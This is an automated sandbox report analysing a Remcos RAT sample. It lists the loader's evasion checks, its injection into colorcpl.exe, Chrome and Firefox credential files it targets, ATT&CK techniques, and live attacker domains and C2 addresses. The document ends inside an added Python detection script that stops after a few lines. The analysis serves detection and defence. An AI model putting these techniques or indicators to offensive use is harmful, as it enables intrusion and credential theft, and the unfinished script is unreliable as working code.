                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_030987A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,5_2_030987A0
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_030DBA59 FindFirstFileExA,5_2_030DBA59
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_0309AA71 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,5_2_0309AA71
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_030A7AAB FindFirstFileW,FindNextFileW,FindNextFileW,5_2_030A7AAB
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_03097848 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,5_2_03097848
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_030968CD FindFirstFileW,FindNextFileW,5_2_030968CD
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_0309AC78 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,5_2_0309AC78
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_0299B28E FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,10_2_0299B28E
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_0299838E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,10_2_0299838E
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_029AA01B FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,10_2_029AA01B
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_029987A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,10_2_029987A0
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_029A7AAB FindFirstFileW,FindNextFileW,FindNextFileW,10_2_029A7AAB
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_029DBA59 FindFirstFileExA,10_2_029DBA59
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_0299AA71 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,10_2_0299AA71
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_029968CD FindFirstFileW,FindNextFileW,10_2_029968CD
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_02997848 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,10_2_02997848
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_0299AC78 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,10_2_0299AC78
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_03096D28 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,5_2_03096D28
                Source: SEPTobn3BR.exe, 00000000.00000002.1420164294.00000000005BE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWp
                Source: SEPTobn3BR.exe, 00000000.00000002.1420164294.000000000060A000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000005.00000003.2755615191.000000003121C000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000005.00000002.3812820641.000000003121C000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000005.00000003.1465318188.000000003121C000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000005.00000003.2755366865.000000003121C000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000005.00000002.3812571420.00000000311CA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: Emxwenem.PIF, 00000007.00000002.1527852577.00000000007FD000.00000004.00000020.00020000.00000000.sdmp, Emxwenem.PIF, 0000000B.00000002.1609172246.000000000077E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeAPI call chain: ExitProcess graph end nodegraph_0-65084
                Source: C:\Windows\SysWOW64\colorcpl.exeAPI call chain: ExitProcess graph end nodegraph_5-47048
                Source: C:\Users\Public\Libraries\Emxwenem.PIFAPI call chain: ExitProcess graph end node

Anti Debugging

Source: C:\Users\user\Desktop\SEPTobn3BR.exe | Code function: 0_2_02B9EBF0 GetModuleHandleW,GetProcAddress,CheckRemoteDebuggerPresent,0_2_02B9EBF0
Source: C:\Users\user\Desktop\SEPTobn3BR.exe | Process queried: DebugPort
Source: C:\Users\Public\Libraries\Emxwenem.PIF | Process queried: DebugPort
Source: C:\Users\Public\Libraries\Emxwenem.PIF | Process queried: DebugPort
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_030C27AE IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_030C27AE
Source: C:\Users\user\Desktop\SEPTobn3BR.exe | Code function: 0_2_02B987A0 LoadLibraryW,GetProcAddress,FreeLibrary,0_2_02B987A0
Source: C:\Users\user\Desktop\SEPTobn3BR.exe | Code function: 0_2_02C60939 mov eax, dword ptr fs:[00000030h] 0_2_02C60939
Source: C:\Users\user\Desktop\SEPTobn3BR.exe | Code function: 0_2_02C21D41 mov eax, dword ptr fs:[00000030h] 0_2_02C21D41
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_030D07B5 mov eax, dword ptr fs:[00000030h] 5_2_030D07B5
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_029D07B5 mov eax, dword ptr fs:[00000030h] 10_2_029D07B5
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_030A0763 SetLastError,GetNativeSystemInfo,SetLastError,GetProcessHeap,HeapAlloc,SetLastError,5_2_030A0763
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_030C27AE IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_030C27AE
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_030C98AC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_030C98AC
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_030C28FC SetUnhandledExceptionFilter,5_2_030C28FC
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_030C2D5C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_030C2D5C
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_029C27AE IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_029C27AE
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_029C98AC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_029C98AC
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_029C28FC SetUnhandledExceptionFilter,10_2_029C28FC
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_029C2D5C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,10_2_029C2D5C

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\Public\Libraries\Emxwenem.PIF | Process created / APC Queued / Resumed: C:\Windows\SysWOW64\colorcpl.exe
Source: C:\Users\user\Desktop\SEPTobn3BR.exe | Process created / APC Queued / Resumed: C:\Windows\SysWOW64\colorcpl.exe
Source: C:\Users\Public\Libraries\Emxwenem.PIF | Process created / APC Queued / Resumed: C:\Windows\SysWOW64\colorcpl.exe
Source: C:\Users\user\Desktop\SEPTobn3BR.exe | Memory allocated: C:\Windows\SysWOW64\colorcpl.exe base: 3090000 protect: page execute and read and write
Source: C:\Users\Public\Libraries\Emxwenem.PIF | Memory allocated: C:\Windows\SysWOW64\colorcpl.exe base: 2990000 protect: page execute and read and write
Source: C:\Users\Public\Libraries\Emxwenem.PIF | Memory allocated: C:\Windows\SysWOW64\colorcpl.exe base: 2C00000 protect: page execute and read and write
Source: C:\Users\user\Desktop\SEPTobn3BR.exe | Thread APC queued: target process: C:\Windows\SysWOW64\colorcpl.exe
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe 5_2_030A0B5C
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe 10_2_029A0B5C
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_030A75E1 mouse_event,5_2_030A75E1
Source: C:\Users\user\Desktop\SEPTobn3BR.exe | Process created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exe
Source: C:\Users\Public\Libraries\Emxwenem.PIF | Process created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exe
Source: C:\Users\Public\Libraries\Emxwenem.PIF | Process created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exe
Source: colorcpl.exe, 00000005.00000002.3812685840.00000000311F5000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000005.00000003.2755366865.00000000311F5000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program ManagerX7\
Source: colorcpl.exe, 00000005.00000002.3812685840.00000000311F5000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000005.00000003.2755366865.00000000311F5000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager
Source: colorcpl.exe, 00000005.00000002.3812571420.00000000311CA000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager!
Source: colorcpl.exe, 00000005.00000002.3812685840.00000000311F5000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Managerr|
Source: colorcpl.exe, 00000005.00000003.2755366865.00000000311F5000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program ManagerX7\d
Source: colorcpl.exe, 00000005.00000002.3812685840.0000000031205000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000005.00000003.2755715581.0000000031205000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000005.00000002.3812685840.00000000311F0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: |Program Manager|
Source: colorcpl.exe, 00000005.00000002.3812685840.00000000311F5000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager=
Source: colorcpl.exe, 00000005.00000002.3812571420.00000000311CA000.00000004.00000020.00020000.00000000.sdmp, logs.dat.5.dr | Binary or memory string: [Program Manager]
Source: C:\Users\user\Desktop\SEPTobn3BR.exe | Code function: 0_2_02C13F66 cpuid 0_2_02C13F66
Source: C:\Users\user\Desktop\SEPTobn3BR.exe | Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,0_2_02B85A78
Source: C:\Users\user\Desktop\SEPTobn3BR.exe | Code function: GetLocaleInfoA,0_2_02B8A798
Source: C:\Users\user\Desktop\SEPTobn3BR.exe | Code function: GetLocaleInfoA,0_2_02B8A74C
Source: C:\Users\user\Desktop\SEPTobn3BR.exe | Code function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,0_2_02B85B84
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: GetLocaleInfoA,5_2_0309E2BB
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: EnumSystemLocalesW,5_2_030DF216
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,5_2_030DF2A3
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: EnumSystemLocalesW,5_2_030DF130
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: EnumSystemLocalesW,5_2_030DF17B
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: GetLocaleInfoW,5_2_030DF723
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,5_2_030DF7F0
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,5_2_030DF61C
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: GetLocaleInfoW,5_2_030DF4F3
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: EnumSystemLocalesW,5_2_030D5914
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: GetLocaleInfoW,5_2_030D5E1C
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,5_2_030DEEB8
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: GetLocaleInfoA,10_2_0299E2BB
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,10_2_029DF2A3
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: EnumSystemLocalesW,10_2_029DF216
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: EnumSystemLocalesW,10_2_029DF130
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: EnumSystemLocalesW,10_2_029DF17B
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,10_2_029DF61C
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,10_2_029DF7F0
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: GetLocaleInfoW,10_2_029DF723
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: GetLocaleInfoW,10_2_029DF4F3
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: EnumSystemLocalesW,10_2_029D5914
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,10_2_029DEEB8
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: GetLocaleInfoW,10_2_029D5E1C
Source: C:\Users\Public\Libraries\Emxwenem.PIF | Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,11_2_02C35A78
Source: C:\Users\Public\Libraries\Emxwenem.PIF | Code function: GetLocaleInfoA,11_2_02C3A798
Source: C:\Users\Public\Libraries\Emxwenem.PIF | Code function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,11_2_02C35B83
Source: C:\Windows\SysWOW64\cmd.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\SEPTobn3BR.exe | Code function: 0_2_02B89194 GetLocalTime,0_2_02B89194
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_030A95F8 GetComputerNameExW,GetUserNameW,5_2_030A95F8
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_030D66BF _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,5_2_030D66BF
Source: C:\Users\user\Desktop\SEPTobn3BR.exe | Code function: 0_2_02B8B714 GetVersionExA,0_2_02B8B714
Source: C:\Windows\SysWOW64\colorcpl.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Source: Yara match | File source: 13.2.colorcpl.exe.2c00000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.colorcpl.exe.3090000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.colorcpl.exe.2990000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.colorcpl.exe.2990000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.colorcpl.exe.3090000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 13.2.colorcpl.exe.2c00000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.SEPTobn3BR.exe.2b80000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000005.00000002.3812934475.00000000313BF000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.1623286615.000000001ECB8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.1606949388.0000000002C00000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.3812571420.00000000311A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.1526792578.0000000000758000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.3812685840.00000000311F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000003.2755366865.00000000311F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1449264347.000000007E8E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.3812571420.00000000311CA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.1526920917.0000000002990000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: SEPTobn3BR.exe PID: 7648, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: colorcpl.exe PID: 7920, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: colorcpl.exe PID: 3232, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: colorcpl.exe PID: 6756, type: MEMORYSTR
Source: Yara match | File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data 5_2_0309A953
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data 10_2_0299A953
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\ 5_2_0309AA71
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: \key3.db 5_2_0309AA71
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\ 10_2_0299AA71
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: \key3.db 10_2_0299AA71

Remote Access Functionality

Source: C:\Windows\SysWOW64\colorcpl.exe | Mutex created: \Sessions\1\BaseNamedObjects\Rmc-3W4HX7
Source: C:\Windows\SysWOW64\colorcpl.exe | Mutex created: \Sessions\1\BaseNamedObjects\Rmc-3W4HX7
Source: C:\Windows\SysWOW64\colorcpl.exe | Mutex created: \Sessions\1\BaseNamedObjects\Rmc-3W4HX7
Source: Yara match | File source: 13.2.colorcpl.exe.2c00000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.colorcpl.exe.3090000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.colorcpl.exe.2990000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.colorcpl.exe.2990000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.colorcpl.exe.3090000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 13.2.colorcpl.exe.2c00000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.SEPTobn3BR.exe.2b80000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000005.00000002.3812934475.00000000313BF000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.1623286615.000000001ECB8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.1606949388.0000000002C00000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.3812571420.00000000311A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.1526792578.0000000000758000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.3812685840.00000000311F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000003.2755366865.00000000311F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1449264347.000000007E8E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.3812571420.00000000311CA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.1526920917.0000000002990000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: SEPTobn3BR.exe PID: 7648, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: colorcpl.exe PID: 7920, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: colorcpl.exe PID: 3232, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: colorcpl.exe PID: 6756, type: MEMORYSTR
Source: Yara match | File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: cmd.exe 5_2_0309567A
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: cmd.exe 10_2_0299567A
MITRE ATT&CK Matrix (techniques flagged for this sample are prefixed with their signature count; the remaining entries are the unflagged cells of the matrix)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology; IP Addresses; Network Security Appliances
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising; Compromise Infrastructure; Domains
Initial Access: 1 Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise; Compromise Software Dependencies and Development Tools
Execution: 1 Native API; 1 Command and Scripting Interpreter; 2 Service Execution; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter; PowerShell; AppleScript
Persistence: 1 DLL Side-Loading; 1 Valid Accounts; 1 Windows Service; 1 Registry Run Keys / Startup Folder; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron; Launchd
Privilege Escalation: 1 DLL Side-Loading; 1 Valid Accounts; 11 Access Token Manipulation; 1 Windows Service; 322 Process Injection; 1 Registry Run Keys / Startup Folder; Startup Items; Scheduled Task/Job; At; Cron; Launchd
Defense Evasion: 1 Deobfuscate/Decode Files or Information; 2 Obfuscated Files or Information; 1 DLL Side-Loading; 11 Masquerading; 1 Valid Accounts; 2 Virtualization/Sandbox Evasion; 11 Access Token Manipulation; 322 Process Injection; HTML Smuggling; Dynamic API Resolution; Stripped Payloads
Credential Access: 1 OS Credential Dumping; 211 Input Capture; 2 Credentials In Files; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing; Input Capture
Discovery: 2 System Time Discovery; 1 Account Discovery; 1 System Service Discovery; 1 System Network Connections Discovery; 2 File and Directory Discovery; 45 System Information Discovery; 331 Security Software Discovery; 2 Virtualization/Sandbox Evasion; 2 Process Discovery; 1 Application Window Discovery; 1 System Owner/User Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections; Shared Webroot; Software Deployment Tools
Collection: 11 Archive Collected Data; 211 Input Capture; 3 Clipboard Data; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging; Remote Data Staging
Command and Control: 12 Ingress Tool Transfer; 21 Encrypted Channel; 1 Non-Standard Port; 1 Remote Access Software; 2 Non-Application Layer Protocol; 113 Application Layer Protocol; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols; Mail Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol; Exfiltration Over Unencrypted Non-C2 Protocol
Impact: 1 System Shutdown/Reboot; 1 Defacement; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement; External Defacement; Firmware Corruption

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
Behavior Graph ID: 1578037 | Sample: SEPTobn3BR.exe | Start date: 19/12/2024 | Architecture: WINDOWS | Score: 100

Root (node 2)
  DNS/IP: www.maan2u.com; maan2u.com; geoplugin.net
  Signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 14 other signatures
  Started: SEPTobn3BR.exe (node 8), Emxwenem.PIF (node 13), Emxwenem.PIF (node 15)

SEPTobn3BR.exe (node 8; node counters 1 9)
  Network: maan2u.com 103.82.231.117:443 (local ports 49709, 49710), GIGABIT-MY Gigabit Hosting Sdn Bhd, Malaysia
  Dropped: C:\Users\Public\Libraries\Emxwenem.PIF (PE32); C:\Users\Public\Libraries\FX.cmd (DOS); C:\Users\Public\Libraries\Emxwenem (data); C:\Users\Public\Emxwenem.url (MS)
  Signatures: Early bird code injection technique detected; Drops PE files with a suspicious file extension; Allocates memory in foreign processes; 2 other signatures
  Started: colorcpl.exe (node 17; node counters 2 16), cmd.exe (node 22; node counter 1)

Emxwenem.PIF (node 13; node counter 5)
  Signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file
  Started: colorcpl.exe (node 24), cmd.exe (node 26)

Emxwenem.PIF (node 15; node counter 6)
  Signatures: Sample is not signed and drops a device driver; Allocates many large memory junks
  Started: colorcpl.exe (node 28), cmd.exe (node 30; node counter 1)

colorcpl.exe (node 17)
  Network: 185.174.103.111:2404 (local port 49725), ASN-QUADRANET-GLOBAL, US (geolocated Ukraine); geoplugin.net 178.237.33.50:80 (local port 49736), ATOM86-AS ATOM86, Netherlands
  Dropped: C:\ProgramData\remcos\logs.dat (data)
  Signatures: Detected Remcos RAT; Contains functionality to change the wallpaper; Contains functionality to steal Chrome passwords or cookies; 4 other signatures

cmd.exe (node 22) -> conhost.exe (node 32)
cmd.exe (node 26) -> conhost.exe (node 34)
cmd.exe (node 30) -> conhost.exe (node 36)
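The process tree above is the whole story of this sample in one picture: a loader (SEPTobn3BR.exe, then its dropped copy Emxwenem.PIF running from C:\Users\Public\Libraries) starts a signed Windows binary (colorcpl.exe) and injects into it, and only that hollowed process talks to 185.174.103.111:2404 and geoplugin.net. The script below is an added example, not code from the Joe Sandbox report: it encodes the graph as process records and applies the three checks a detection engineer would derive from it (execution from a public folder or with an odd extension, a system binary whose parent is such a process, and outbound traffic from that binary to a non-web port). Node numbers are the graph's node ids, not Windows PIDs, and the image paths for SEPTobn3BR.exe and the System32 binaries are assumptions, since the graph shows image names only.

```python
"""Process-tree triage for the loader -> system-binary -> C2 chain.

Added example, not code from the Joe Sandbox report. Process records are
transcribed from the behaviour graph; node numbers are the graph's node ids.
Paths marked ASSUMED are not shown on the page (the graph gives image names).
"""
from __future__ import annotations

from dataclasses import dataclass, field
from typing import Optional

# User-writable locations that legitimate software almost never executes from.
PUBLIC_DIRS = ("c:\\users\\public\\", "c:\\programdata\\")
# Executable/script extensions that are unusual for a dropped payload.
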